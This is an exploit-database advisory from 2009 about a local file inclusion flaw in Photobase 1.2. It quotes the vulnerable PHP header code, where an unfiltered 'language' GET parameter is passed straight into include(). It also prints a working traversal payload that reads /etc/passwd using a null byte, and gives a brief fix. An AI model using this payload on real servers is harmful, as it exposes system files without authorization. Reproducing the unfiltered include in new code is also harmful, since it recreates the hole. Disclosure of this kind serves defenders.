Photobase 1.2 Local File Inclusion

vendor:

Photobase

by:

Osirys

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Photobase

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Photobase 1.2 Local File Inclusion

There is an include of a variable coming from GET --> $language. Filter $language before the include or just set its value with a local file.

Mitigation:

Filter $language before the include or just set its value with a local file.

Source

Exploit-DB raw data:

[START]

####################################################################################################################
[0x01] Informations:

Script         : Photobase 1.2
Download       : http://www.monstar.nl/php-bin/count.php3?what=photobase.zip&id=0
Vulnerability  : Local File Inclusion
Author         : Osirys
Contact        : osirys[at]live[dot]it
Website        : http://osirys.org


####################################################################################################################
[0x02] Bug: [Local File Inclusion]
######

Bugged file is: /[path]/include/header.php

[CODE]

<?php
include('include/conf.php');
include('include/functions.php');

if(isset($_GET['language']))
	$language = $_GET['language'];

include('language/'.$language.'.php');

[/CODE]

There is an include of a variable coming from GET --> $language

[!FIX] Filter $language before the include or just set its value with a local file.


[!] EXPLOIT: /[path]/include/header.php?language=[local_file]
                                                 ../../../../../../../../../../etc/passwd%00

####################################################################################################################

[/END]

# milw0rm.com [2009-01-11]